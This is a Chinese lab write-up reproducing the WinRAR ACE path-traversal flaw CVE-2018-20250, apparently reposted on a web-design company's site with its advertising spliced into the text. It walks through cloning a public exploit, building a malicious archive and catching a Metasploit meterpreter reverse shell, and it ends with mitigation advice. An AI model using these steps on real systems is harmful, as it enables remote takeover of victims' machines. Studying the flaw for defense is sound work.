該漏洞是由于WinRAR 所使用的一個陳舊的動態(tài)鏈接庫UNACEV2.dll所造成的,該動態(tài)鏈接庫在2006 年被編譯,沒有任何的基礎保護機制(ASLR,DEP 等)。該動態(tài)鏈接庫的作用是處理ACE 格式文件。而在解壓處理過程中存在一處目錄穿越漏洞,允許解壓過程寫入文件至開機啟動項,導致代碼執(zhí)行
目前創(chuàng)新互聯(lián)已為千余家的企業(yè)提供了網站建設、域名、網頁空間、網站托管、服務器租用、企業(yè)網站設計、鹿邑網站維護等服務,公司將堅持客戶導向、應用為本的策略,正道將秉承"和諧、參與、激情"的文化,與客戶和合作伙伴齊心協(xié)力一起成長,共同發(fā)展。漏洞編號: CVE-2018-20250
影響版本:
WinRAR < 5.70 Beta 1
Bandizip < = 6.2.0.0
好壓(2345壓縮) < = 5.9.8.10907
360壓縮 < = 4.0.0.1170
復現(xiàn)環(huán)境exp下載:
https://github.com/WyAtu/CVE-2018-20250/ 復現(xiàn)過程1.使用Metasploit生成Payload
2.使用exp生成惡意程序
cd /root/Desktopgit clone https://github.com/WyAtu/CVE-2018-20250.gitcd CVE-2018-20250cp /root/WinRAR.exe ./vim exp.py
將exp.py中的evil_filename = “calc.exe”改為”WinRAR.exe”
將CVE-2018-20250文件夾復制到Windows10中執(zhí)行
3.在靶機上運行惡意程序
將test.rar 投放到win8上 解壓運行
4.在kali上監(jiān)聽metasploit
msf exploit(handler) > set payload windows/meterpreter/reverse_tcpmsf exploit(handler) > set lhost 192.168.112.140msf exploit(handler) > set lport 44444msf exploit(handler) > run www.gendan5.com
5.控制靶機
Win8重啟之后 kali會接受到會話 此時執(zhí)行shell
進入到win8系統(tǒng)的system權限
漏洞防御1. 刪除受影響壓縮軟件目錄下UNACEV2.dll文件能有效防御
2. 升級到最新版本,WinRAR 目前版本是 5.70 Beta 1
3. 總而言之,該漏洞并沒有那么致命。目標性的打站,得先欺騙下載,并再在未防護的服務器上解壓,企業(yè)服務器管理員都很難會這樣做。而且必須得服務器重啟才能生效,不能直接執(zhí)行腳本
當前題目:WinRAR目錄穿越漏洞-創(chuàng)新互聯(lián)
文章出自:http://m.rwnh.cn/article22/dddjjc.html
成都網站建設公司_創(chuàng)新互聯(lián),為您提供網站策劃、網站收錄、建站公司、網站設計、域名注冊、網頁設計公司
聲明:本網站發(fā)布的內容(圖片、視頻和文字)以用戶投稿、用戶轉載內容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內容未經允許不得轉載,或轉載時需注明來源: 創(chuàng)新互聯(lián)
猜你還喜歡下面的內容